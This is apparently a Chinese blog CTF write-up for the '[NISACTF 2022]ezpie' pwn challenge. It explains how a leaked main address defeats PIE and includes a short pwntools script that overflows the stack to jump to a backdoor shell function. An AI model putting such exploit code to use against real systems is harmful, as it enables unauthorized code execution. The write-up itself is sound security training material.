NSSCTF刷题笔记pwn8——[NISACTF 2022]ezpie

最新推荐文章于 2024-07-17 22:06:37 发布
最新推荐文章于 2024-07-17 22:06:37 发布
阅读量281 收藏 1
点赞数 4
分类专栏: pwn 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45692883/article/details/135995000
版权

看了一下pwn的保护,开启了pie保护

所谓pie保护啊,就是data、text段载入内存的时候,地址会被随机化

main函数,里面调用了vuln函数,并且泄露出自己main函数的地址

vuln很显然是个栈溢出

shell函数,是我们要获取是后门

既然泄露了main的真实地址,那么我们通过偏移也能知道shell的真实地址

文件中shell地址 - 文件中mian地址 = 偏移

内存中main地址 + 偏移 = 内存中shell的地址

知道了这些,那么就可以写代码了

from pwn import *

#io = process('./pwn')
io = remote()

pianyi = 0x80f - 0x770

io.recvline()
main_addr = int(io.recvuntil('\n',drop=True),16)

io.recv()

payload = flat([b'A'*0x2c,main_addr+pianyi])
io.sendline(payload)
io.interactive()

qq_45692883
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
NSSCTF刷题笔记pwn6——[NISACTF 2022]ezstack
qq_45692883的博客
02-02 244
这个shell会使用system函数打印一串内容,并且发现我们读入的数据大于buf的大小,存在栈溢出。栈溢出,system函数,/bin/sh字符串,那么万事已经具备了,开始写脚本。按下shift+12,在字符串界面找到/bin/sh。用ida打开,有一个shell函数。
NSSCTF刷题笔记pwn4——[NISACTF 2022]ReorPwn?
qq_45692883的博客
01-30 184
下载好文件,直接运行,发现就可以执行命令了。那这里介绍一个可以颠倒字符串的命令:rev。那么很简单就做出来了。
NSSCTF刷题笔记pwn3——[CISCN 2019华北]PWN1
qq_45692883的博客
01-19 446
我们直接覆盖掉返回的地址,返回的地址我们填从result=system("cat /flag")开始即可。这里是ida识别出来的v1距离rbp的长度是0x30,然后程序是64位的需要距离返回地址还差8字节。使用ida打开,这里要判断v2要等于11.28125,但是v2压根就不能被改变。gets是栈溢出漏洞的常客了,因为他不会限制我们输入多少内容。差不多就是这里: 0x4006be。知道了这些后,开始写exp。
NSSCTF刷题笔记pwn7——[watevrCTF 2019]Voting Machine 1
qq_45692883的博客
02-02 412
main函数,打印一串大小,看到gets函数,存在栈溢出。可以看到输入的AAAA距离返回地址差10个比特。找到一个读取flag.txt的函数。那么写代码,控制流到这个函数试试看。看了一下没有找到system函数。
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
C语言复习(笔记加例题)第一章:数据类型及其运算
weixin_55021541的博客
07-17 606
通常在其他编程语言中用作字符串的缩写,但在 C 语言中,字符串是通过字符数组char a[]来表示的。:以下哪个类型是 C 语言中用来存储布尔值的?:以下哪个类型是 C 语言中用来存储字符的?:以下哪个不是 C 语言中的基本数据类型?2. C 运算符的种类、运算优先级和结合性。3. 不同类型数据间的转换与运算。4. C 表达式的类型和求值规则。并不是一个基本数据类型。:A,在 C 语言中,
防御笔记第七天(时需更新)
weixin_63264424的博客
07-16 567
HRP在进行双机热备时,还有一个要求,两台热设备之间,必须拥有一条链路,用来同步信息,并且,这条链路必须是三层链路---这两条路在进行数据传输时,不受安全策略的影响,(注意,如果心跳线是直连的,则不受安全策略的影响,但是中间有中继设备,即非直连场景,则需要配置安全策略)----心跳线----VGMP发送的报文也是通过心跳线传输的。配置信息---(接口IP地址,路由地址)-----hrp不能同步基本的接口和路由信息,安全策略和NAT策略……状态信息-----会话表,server-map,黑名单和白名单等等。
计算机网络复习笔记【面向考纲整理】
07-13 382
计算机网络(简称网络)由若干结点(node,节点)和连接这些结点的链路(link)组成。
算法刷题笔记 KMP字符串(C++实现,并给出了求next数组的独家简单理解方式)
hanmo22357的博客
07-12 830
一道经典且较难的算法题,给出了C++代码实现,以及自己对next数组求解的独家简单的理解方式。
java Web学习笔记(三)
qq_62678419的博客
07-12 1058
java 前端工程框架 vue3 包括以下依赖的学习 vite npm router axios
算法刷题笔记 排列数字(C++实现)
最新发布
hanmo22357的博客
07-17 208
一道简单的深度优先搜索(DFS)模板题,给出了DFS问题的一般思路以及C++代码实现
Java并发编程与高并发解决方案笔记
tuku0801的专栏
07-17 664
将结合大量图示及代码演示,带你掌握多线程并发编程(线程安全,线程调度,线程封闭,同步容器等)与高并发处理思路与手段(扩容,缓存,队列,拆分等),构建完整的并发与高并发知识体系
AGV栅格地图与QImage图片转换笔记
Pou光明的博客
07-15 275
最近在加班加点处理一个agv相关的任务,印象比较深的是将agv给的json数据转换为一个图片。最终的简化需求是将某坐标系下的二维点数据转换为一张图片的像素。Ok,首先的问题是如何将二维的数据映射到栅格坐标系。先看数据例子:"mapType":"2D-Map","maxPos":{"x":4.51,"y":16.331},"minPos":{"x":-14.138,"y":-1.48} "resol...
OpenGL笔记十一之Uniform变量及实现一个颜色忽明忽暗的三角形
小勇博客
07-14 329
— 2024-07-14 上午。
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值